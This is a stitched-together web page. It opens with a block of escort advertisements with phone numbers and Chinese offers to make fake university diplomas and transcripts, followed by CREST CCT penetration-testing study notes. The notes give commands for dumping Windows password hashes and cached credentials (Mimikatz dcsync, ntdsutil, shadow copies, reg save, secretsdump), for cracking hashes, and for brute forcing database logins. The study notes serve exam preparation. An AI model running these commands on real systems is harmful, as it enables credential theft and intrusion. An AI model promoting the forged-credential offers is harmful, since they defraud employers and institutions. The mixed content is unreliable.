Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in  Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in  Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 

CREST CCT Lab Prep Notes

Knowledge of local Windows privilege escalation vulnerabilities and techniques.

Knowledge of common post-exploitation activities:

• Obtain password hashes, both from the local SAM and cached credentials

HASHES

Hashes are stored in the SAM database on a Windows system, or in the NTDS database on a Domain Controller:

1. SAM file (need both C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM; the SYSTEM hive holds the boot key needed to decrypt the SAM, so the SAM on its own is useless)
2. Registry (HKEY_LOCAL_MACHINE\SECURITY\Cache for cached domain credentials, HKEY_LOCAL_MACHINE\SAM for local credentials)
3. Domain Controller: C:\Windows\NTDS\NTDS.dit
4. In memory (dump with Mimikatz); this last one is not "stored" in the sense of written to disk.

• LM hashes are the oldest password storage format used by Windows, dating back to OS/2 in the 1980s. They have been turned off by default since Windows Vista / Server 2008, but it is still possible to enable them in later versions (even Windows 10 / Server 2016) through a GPO setting.
• The NT hash is often referred to as the "NTLM hash", but the two are different things: the NT hash is the stored value (MD4 of the UTF-16LE password, unsalted), while NTLM is the network authentication protocol that uses it. NTLMv1 uses the NT hash and/or the LM hash, depending on configuration and what is available. NTLMv2 (a different, HMAC-MD5 based algorithm) has been available since NT 4.0 SP4 and is the default since Windows Vista / Server 2008 (LmCompatibilityLevel 3).

OBTAINING THE HASHES

• Mimikatz has a feature (dcsync) which uses the Directory Replication Service (DRS) protocol to request password hashes from a Domain Controller exactly as a replicating DC would, so NTDS.DIT never has to be read from disk. It can be executed from any domain-joined system in the context of an account with directory replication rights (Domain Admins have these by default):
    lsadump::dcsync /domain:pentestlab.local /all /csv
• ntdsutil is part of the Domain Controller ecosystem; its purpose is to enable administrators to access and manage the Active Directory database. An "Install From Media" (IFM) snapshot gives a consistent copy of NTDS.DIT together with the registry hives needed to decrypt it:
    ntdsutil
    activate instance ntds
    ifm
    create full C:\ntdsutil
    quit
    quit
  Two new folders are generated, Active Directory and Registry. NTDS.DIT is saved in the Active Directory folder and the SAM and SYSTEM hives are saved in the Registry folder.
• DiskShadow is a Microsoft-signed binary used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). It is included in Windows Server 2008, 2012 and 2016.
• VSSAdmin comes with Windows Server. Volume Shadow Copy is a Windows command-line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. Note that "vssadmin create shadow" is only available on Server editions; on client SKUs use DiskShadow or "wmic shadowcopy call create Volume=C:\" instead.
    vssadmin list shadows                    - check whether any shadow copies already exist
    vssadmin create shadow /for=C:           - create a shadow copy, then copy ntds.dit and SYSTEM
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\SAM1
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\SYSTEM1
  NTDS.dit will not exist if you did not dump from a DC (on a DC it is under \Windows\NTDS\ntds.dit inside the shadow copy).
    vssadmin delete shadows /shadow={GUID}   - delete the shadow copy (if you need to clean up)
  Then extract the hashes using either samdump2 or Impacket.
• Cain can also be used to dump the passwords.
• Registry and samdump2
    C:\WINDOWS\system32>reg save hklm\sam c:\sam
    The operation completed successfully.
    C:\WINDOWS\system32>reg save hklm\system c:\system
    The operation completed successfully.
    C:\WINDOWS\system32>reg save hklm\security c:\security
    The operation completed successfully.
  The SECURITY hive contains the cached domain credentials and LSA secrets. Copy the files to Kali and run samdump2 (or Impacket, which gives more information):
    root@Kali:~# samdump2 system sam
    *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Note that aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string (and the placeholder tools print when no LM hash is stored) and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string. An account showing both has a blank password (typical for the disabled built-in accounts seen here) and is not a cracking target.
• PWDump - pwdump7 needs to be run as an administrator:
    pwdump7 > hash.txt
• Cached credentials
  Having dumped the SECURITY hive from the registry:
    C:\WINDOWS\system32>reg save hklm\security c:\security
    The operation completed successfully.
  Then, from Kali, Impacket's secretsdump gives the information from SAM, SYSTEM and SECURITY together. The file names here are sam, system and security; if you do not have the security hive, drop the -security option:
    root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL
  (On current Kali the same script is installed as impacket-secretsdump.)
    Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies

    [*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
    [*] Dumping LSA Secrets
    [*] DPAPI_SYSTEM
    0000   01 00 00 00 D7 C6 B0 AD  57 36 7C D6 4C 22 3A 59   ........W6|.L":Y
    0010   25 9E 19 C8 3F E0 8C E7  FD C5 53 6F B4 84 2E 83   %...?.....So....
    0020   3B DB 63 C1 A5 EB FF 3A  05 89 C4 29               ;.c....:...)
    [*] NL$KM
    0000   5E FD D7 75 81 79 FE B5  B8 09 59 CA D9 68 76 32   ^..u.y....Y..hv2
    0010   B4 96 A7 B3 A6 12 66 1D  D9 AE C0 ED AE D2 0C B7   ......f.........
    0020   6E E7 8E 89 D2 41 BF 92  58 E6 D4 C7 04 54 89 58   n....A..X....T.X
    0030   01 EA D5 75 6C 8E EE E6  8C D6 F6 AA 02 12 7A 47   ...ul.........zG
    [*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0
    0000   35 00 30 00 30 00 39 00  30 00 39 00 33 00 37 00   5.0.0.9.0.9.3.7.
    0010   00 00 31 00 36 00 30 00  38 00 00 00 33 00 00 00   ..1.6.0.8...3...
    0020   00 00 00 00 44 00 61 00  76 00 69 00 64 00 33 00   ....D.a.v.i.d.3.
    0030   30 00 39 00 2D 00 56 00  50 00 4E 00 00 00 40 00   0.9.-.V.P.N...@.
    0040   4A 00 61 00 70 00 61 00  6E 00 30 00 31 00 23 00   x.x.x.x.x.x.x.x.
    0050   00 00 00 00 30 00 00 00  00 00                     ....0.....
    [*] Cleaning up...

  No cached domain logon (DCC2) entries appear, so this host had no cached domain logons. The LSA secrets do include a RasDialParams entry, which is where Windows keeps saved dial-up/VPN credentials for a user SID: a locally-stored clear-text password, which is the next item on the list.

• Obtain locally-stored clear-text passwords
• Crack password hashes: John the Ripper, or Cain & Abel, a Windows-based tool with a host of useful features including a password cracker. It is normally a good idea to break very weak passwords with a simple dictionary attack and a short (5-character) brute-force attack first, then let rainbow tables pick up the rest.
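Before feeding a dump like the ones above to John or hashcat it pays to triage it. The following is an added example, not part of the original notes: a Python parser for the pwdump-format lines that samdump2 and secretsdump emit, which drops the empty-password placeholders, notes which accounts still have an LM hash (cheap to crack first), and groups accounts whose NT hash is identical, since unsalted storage means they share a password. The sample dump is constructed: fireman and david carry the well-known LM/NT hashes of "password", and svc_backup's NT hash is a made-up placeholder.

```python
import re
from collections import defaultdict

# pwdump / secretsdump line: user:rid:lmhash:nthash:::  (samdump2 may prefix "*disabled* ")
PWDUMP_RE = re.compile(
    r"^(?:\*disabled\*\s+)?(?P<user>[^:]*):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (also the "no LM hash stored" placeholder)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (MD4 of the empty string)

# Constructed sample (not a real dump). fireman/david: real LM/NT hashes of "password";
# svc_backup: placeholder NT hash chosen for the example.
SAMPLE_DUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fireman:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
david:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Dumping LSA Secrets
"""


def parse_pwdump(text):
    """Return one dict per well-formed pwdump line; banner and other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        entries.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            "disabled": line.lstrip().startswith("*disabled*"),
        })
    return entries


def triage(entries):
    """Separate what the dump already gives away from what is worth cracking."""
    report = {"blank_password": [], "lm_present": [], "crack_nt": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            report["blank_password"].append(e["user"])   # nothing to crack here
            continue
        if e["lm"] != EMPTY_LM:
            report["lm_present"].append(e["user"])       # LM first (hashcat -m 3000), it is cheap
        report["crack_nt"].append(e["user"])             # then NT (hashcat -m 1000)
        by_nt[e["nt"]].append(e["user"])
    # Unsalted storage: an identical NT hash means an identical password.
    report["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return report


if __name__ == "__main__":
    for key, value in triage(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{key:15} {value}")
```

The shared_nt map is the part worth reading before cracking anything: one crack of 8846f7ea... covers both fireman and david, and the LM hash on fireman's row can be broken in seconds and then used as a case-insensitive hint for the NT half.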
SHA256 hashing:
    kali# echo pearson | sha256sum
    901….ba13
  (echo appends a newline, so this hashes "pearson\n"; use echo -n to hash the bare string.)

Windows password storage does not use a salt, so two users with the same password have identical hashes. Linux salts (crypt/shadow), so the same password gives different hashes for different users. Cracked NT passwords preserve case, whereas cracked LM passwords are always uppercase, because LM uppercases the password before hashing.

John the Ripper

John comes with its own dictionary at /usr/share/john/password.lst. You can edit the file to add your own passwords, or supply your own list with --wordlist=/usr/share/john/file.lst.

In the output the cracked password is on the left-hand side and the username on the right. The number after the username tells you which half of an LM hash is being cracked: LM truncates the password to 14 characters, uppercases it and splits it into two 7-character halves that are hashed independently, so "password" is stored as PASSWOR and D. Each half can therefore be cracked separately, which is what makes LM so weak.
    kali# john password-hashes.txt
    ACME201          (fireman:2)
The command below shows all passwords that have been cracked:
    kali# john --show password-hashes.txt
The hidden directory ~/.john stores the output files (.log, .pot, .rec).

Change the format to NT cracking (when a pwdump file contains both, john picks the LM hashes by default):
    kali# john password-hashes.txt --format=nt
…and the format must then also be given to the show command:
    kali# john --show --format=nt password-hashes.txt

Hashcat

GPU (graphics card) support, so faster; works on Windows and is able to crack a large variety of hash formats.
    hashcat64.exe --potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3
The potfile is where the cracked passwords are stored; -m 3000 specifies the hash format being cracked (3000 is LM, 1000 is NT); -a 3 specifies brute force (mask attack; with no mask given, hashcat uses its built-in default mask).

To view the cracked passwords:
    hashcat64.exe -m 3000 --potfile-path cracked_passwords.pot password_hashes.txt --show --username

Dictionary attack (-a 0, the default) with a rule set:
    hashcat64.exe --potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:\tools\hats\rockyou.txt -r D:\tool\hashcat-3.6.0\rules\InsidePro-PasswordsPro.rule
The rule file specifies various mangling rules.

• Check patch levels – CREST Exam Notes
  WMIC:
    wmic qfe list full /format:htable > hotfixes.htm
  PowerShell (enter powershell):
    Get-WmiObject -Class "win32_quickfixengineering"
    Get-HotFix
  Linux:
    Debian or Ubuntu: apt-get upgrade -s | grep -i security
    RH: rpm -qa --last
• Derive list of missing security patches
• Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
Appendix G: Web Technologies

G2 Web Servers & their Flaws
Common web servers, their fundamental differences and the vulnerabilities associated with them:
• IIS – p372 Network Security Assessment
• Apache (and variants) – p373 Network Security Assessment

G4 Web Protocols
Web protocols: HTTP, HTTPS, SOAP. All HTTP web methods and response codes.
• See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16)
HTTP header fields relating to security features
• See Web App and Exam Notes

G7 Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403), Ruby on Rails (p409) and AJAX. Chapter 14, Network Security Assessment.
AJAX Security - CS.html
DotNet Security - CS.html
Ruby on Rails - CS.html

G8 Web APIs
Application interfaces: CGI, ISAPI filters and Apache modules.

G9 Web Sub-Components
Web architecture sub-components: thin/thick web clients, servlets and applets, ActiveX.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code
Base64 decoding? – Burp Decoder
Appendix H: Web Testing Methodologies

H3 Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
• Hidden form fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields
• Database connection strings
• Credentials
• Developer comments
• Other included files
• Authenticated-only URLs

H4 Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms.
• Useful p180, 2nd Edition

H5 Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms.

H6 Input Validation
The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation.

H7 Application Fuzzing
Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications.

H9 Use of Cross Site Scripting Attacks
Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker.

H10 Use of Injection Attacks
Potential implications of injection vulnerabilities:
• SQL injection
• LDAP injection
• Code injection
• XML injection
Ways in which these techniques can be used to benefit an attacker.
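An added example, not from the original notes, contrasting the three approaches H6 names, in Python: a black list that rejects known-bad tokens, a white list that accepts only the expected shape, and sanitisation that encodes rather than rejects. The inputs are constructed; the mixed-case script tag is the classic demonstration of why a black list on its own is not a control.

```python
import html
import re

# White list: the only shape a username is allowed to take.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")

# Black list: tokens we happen to know are dangerous (constructed, deliberately incomplete).
BAD_TOKENS = ("<script", "javascript:", "onerror=")


def denylist_ok(value: str) -> bool:
    """Black listing: reject anything containing a known-bad token.
    Fails open against case changes, encodings and vectors not on the list."""
    return not any(token in value for token in BAD_TOKENS)


def allowlist_ok(value: str) -> bool:
    """White listing: accept only what matches the expected grammar; everything else is rejected."""
    return USERNAME_RE.fullmatch(value) is not None


def sanitise_for_html(value: str) -> str:
    """Data sanitisation: keep the input but encode it so it cannot change context
    when rendered as HTML text or inside a quoted attribute."""
    return html.escape(value, quote=True)


def validate_username(value: str) -> str:
    """Preferred pattern for identifiers: white list first, explicit error otherwise.
    Do not 'clean' an identifier into something the user never typed."""
    if not allowlist_ok(value):
        raise ValueError("username must be 3-32 characters of [A-Za-z0-9_.-]")
    return value


def compare(inputs):
    """Run all three controls over a set of inputs; returns {input: (denylist, allowlist, sanitised)}."""
    return {v: (denylist_ok(v), allowlist_ok(v), sanitise_for_html(v)) for v in inputs}


if __name__ == "__main__":
    samples = ["alice", "<script>alert(1)</script>", "<ScRiPt>alert(1)</ScRiPt>", "bob O'Neil"]
    for value, (deny, allow, clean) in compare(samples).items():
        print(f"{value!r:32} denylist={deny!s:5} allowlist={allow!s:5} sanitised={clean!r}")
```

The third sample passes the black list and fails the white list, which is the whole argument for white listing input that has a known shape; sanitisation is the right tool for free text that must be stored as typed but rendered safely.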
H11 Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.

H12 Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of encoded values (e.g. Base64) and identification and exploitation of cryptographic values (e.g. MD5 hashes).
Identification of common SSL vulnerabilities.

H13 Source Code Review
Common techniques for identifying and reviewing deficiencies in the areas of security.
• Useful table p164, 2nd Edition
Appendix I: Web Testing Techniques

I1 Web Site Structure Discovery
Spidering tools and their relevance in a web application test for discovering linked content. Forced browsing techniques to discover default or unlinked content - Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto
• Identification of functionality within client-side code

I2 Cross Site Scripting Attacks
Arbitrary JavaScript execution. Using Cross Site Scripting techniques to obtain sensitive information from other users. Phishing techniques.
• See XSS

I3 SQL Injection
Determine the existence of an SQL injection condition in a web application. Determine the existence of a blind SQL injection condition in a web application. Exploit SQL injection to enumerate the database and its structure. Exploit SQL injection to execute commands on the target server.
• See SQL injection

I4 Session ID Attacks
Investigate session handling within a web application. Harvest and analyse a number of session identifiers for weaknesses.
• See Testing Session ID and Token Strength
• Useful table p167 2nd Edition

I5 Fuzzing
The concept of fuzzing within a web application testing methodology. Common fuzzing tools.

I6 Parameter Manipulation
Parameter manipulation techniques, particularly the use of client-side proxies.

I7 Data Confidentiality & Integrity
Identifying weak (or missing) encryption. Identifying insecure SSL configurations.
Identifying insecure use of encoding techniques.

I8 Directory Traversal
Identifying directory traversal vulnerabilities within applications.
• See RFI and LFI, Path Traversal

I9 File Uploads
Identifying common vulnerabilities with file upload capabilities within applications.
• See Uploads

I10 Code Injection
Investigation and exploitation of code injection vulnerabilities within web applications.
• See OS command injection – get Commix working…

I11 CRLF Attacks
Assessment of web applications for CRLF vulnerabilities.
• See HTTP Testing – Headers

I12 Application Logic Flaws
Assessing the logic flow within an application and the potential for subverting the logic.
Appendix J: Databases

J1 Microsoft SQL Server (p424)
Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.
• See CREST exam notes

J2 Oracle RDBMS (p426)
Derivation of version and patch information from hosts running Oracle software. Default Oracle accounts.
• See CREST exam notes

J3 Web / App / Database Connectivity
Common databases (MS SQL Server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications.
• See CREST exam notes

Useful Nmap Scripts

MS SQL
ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later include support for account lockout policies, so guessing can lock accounts out; agree this with the client before running it.

MySQL
    nmap -p 3306 --script=mysql-info 127.0.0.1
Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt.
    nmap -sV -sC <target>
    3306/tcp open  mysql
    | mysql-info:
    |   Protocol: 10
    |   Version: 5.0.51a-3ubuntu5.1
    |   Thread ID: 7
    |   Capabilities flags: 40968
    |   Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth
    |   Status: Autocommit
    |_  Salt: bYytNQ/4V6IN+*3`imj

mysql-enum – Performs valid-user enumeration. Server version 5.x is susceptible to a user enumeration attack due to different error messages during login when the old authentication mechanism from versions 4.x and earlier is used.

mysql-brute – Basic brute force; can be run without a word list.
    nmap --script=mysql-brute <target>
    3306/tcp open  mysql
    | mysql-brute:
    |   Accounts
    |     root:root - Valid credentials
Additional

Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318)

ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether the host accepts or rejects it. The end result is a list of all the cipher suites and compressors that the server accepts.
    nmap -sV --script ssl-enum-ciphers -p 443 <host>
• POODLE - A server can be deduced to be vulnerable to POODLE if it supports the SSLv3 protocol and offers CBC ciphers under it.
• BEAST - Any server supporting SSLv3 or TLS 1.0 with CBC ciphers. BEAST was an attack on CBC mode with a predictable (in fact known) IV in SSL 3.0 and TLS 1.0, because those protocols used the last ciphertext block of the previous record, which has (usually) already been sent and seen by the adversary, as the IV for the next record. TLS 1.1 introduced explicit per-record IVs, which is why CBC suites under TLS 1.1 and later are not BEAST targets. POODLE is not an attack on the IV at all; it is a padding oracle attack on the padding used in SSL 3.0 (and, it turned out, in some debatably defective TLS 1.0 implementations), hence the acronym Padding Oracle On Downgraded Legacy Encryption.
Examples.txt

HTTP header fields relating to security features – e.g. HSTS
• See CREST Notes: HTTP Header Fields relating to security features
• Useful p172, 2nd Edition
Strict-Transport-Security.html

Web server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition
http-webdav-scan - The script sends an OPTIONS request which lists the DAV type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by pattern matching in the response body.
    nmap --script http-webdav-scan -p80,8080 <target>

Script output:
    PORT     STATE SERVICE
    8008/tcp open  http
    | http-webdav-scan:
    |   Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT
    |   Server Type: DAV/0.9.8 Python/2.7.6
    |   Server Date: Fri, 22 May 2015 19:28:00 GMT
    |   WebDAV type: Unknown
    |   Directory Listing:
    |     http://localhost
    |     http://localhost:8008/WebDAVTest_b1tqTWeyRR
    |     http://localhost:8008/WebDAVTest_A0QWJb7hcK
    |     http://localhost:8008/WebDAVTest_hf9Mqqpi1M
    |_    http://localhost:8008/WebDAVTest_Ds5KBFywDq
Note PUT, MOVE, COPY and DELETE in Allowed Methods: if those are accepted without authentication, an attacker can write content to the server and rename it, not just read it.
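The POODLE and BEAST rules stated above are simple enough to apply mechanically to ssl-enum-ciphers output. This is an added example, not from the original notes: a Python parser for the protocol headings and cipher-suite lines in Nmap's format, with a triage that flags SSLv3 + CBC (POODLE), SSLv3/TLSv1.0 + CBC (BEAST) and any RC4 suite. The Nmap output below is constructed to match the script's layout; it is not a real scan.

```python
import re
from collections import OrderedDict

# Protocol headings and cipher-suite lines as Nmap's ssl-enum-ciphers prints them.
PROTO_RE = re.compile(r"^(SSLv3|TLSv1\.[0-3]):$")
CIPHER_RE = re.compile(r"^((?:TLS|SSL)_[A-Z0-9_]+)\b")

# Constructed sample in Nmap's output format (not a real scan result).
SAMPLE_NMAP = """\
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3:
|     ciphers:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|     compressors:
|       NULL
|   TLSv1.0:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A
|_  least strength: C
"""


def parse_ssl_enum_ciphers(output: str):
    """Map protocol version -> list of accepted cipher-suite names."""
    protos = OrderedDict()
    current = None
    for raw in output.splitlines():
        line = raw.lstrip("|_ ").rstrip()      # drop Nmap's "|"/"|_" gutter and indentation
        m = PROTO_RE.match(line)
        if m:
            current = m.group(1)
            protos.setdefault(current, [])
            continue
        m = CIPHER_RE.match(line)
        if m and current is not None:
            protos[current].append(m.group(1))
    return protos


def is_cbc(suite: str) -> bool:
    return "_CBC_" in suite or suite.endswith("_CBC")


def triage_tls(protos):
    """Apply the rules from the notes: POODLE = SSLv3+CBC, BEAST = SSLv3/TLSv1.0+CBC; RC4 is weak anywhere."""
    findings = {"poodle": [], "beast": [], "rc4": []}
    for proto, suites in protos.items():
        for suite in suites:
            if proto == "SSLv3" and is_cbc(suite):
                findings["poodle"].append((proto, suite))
            if proto in ("SSLv3", "TLSv1.0") and is_cbc(suite):
                findings["beast"].append((proto, suite))   # TLS 1.1+ has explicit IVs, so not listed
            if "RC4" in suite:
                findings["rc4"].append((proto, suite))
    return findings


if __name__ == "__main__":
    for issue, hits in triage_tls(parse_ssl_enum_ciphers(SAMPLE_NMAP)).items():
        print(issue.upper(), "->", ", ".join(f"{p} {s}" for p, s in hits) or "none")
```

The TLSv1.2 CBC suite in the sample is correctly left out of the BEAST list, since the attack depends on the chained-IV behaviour of SSL 3.0 and TLS 1.0 only. When reporting, remember that modern browsers mitigate BEAST client-side (1/n-1 record splitting), so the finding is about legacy protocol support rather than a live exploit path.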
Metasploit has a few modules to test for WebDAV presence.
WebDAV.txt

Decompilation of client-side code – e.g. Flash, Java, .Net

Flash
• Flash maintains its own cookie store (Local Shared Objects) that allows for cookies which cannot be deleted directly from the browser.
• ActionScript is an open-source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a sandbox environment similar to Java's.
• Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan can turn the bytecode back into ActionScript.
• JPEXS Free Flash Decompiler
• Perl script – SWF-File-0.42

Java
• Java code runs in two primary ways: either as standalone Java applications or as web applets. Applets are Java code specifically designed to run within a web page.
• Java has a security model around applets that tries to prevent them from calling malicious code. This model is also known as the sandbox.
• A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.
• Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted, or permission to be given, before it can access functionality that has security implications.
• Java code is compiled into bytecode, resulting in a compiled class file that is then processed by the JVM.
• Reversing Java using JD-GUI – page 391

.Net
• JustDecompile

Vulnerabilities in increasingly prevalent application frameworks – e.g. Rails (p409)
Flash Application Testing
Java Applets
.Net Thick Clients
Identification of functionality within client-side code that is accessible only to privileged users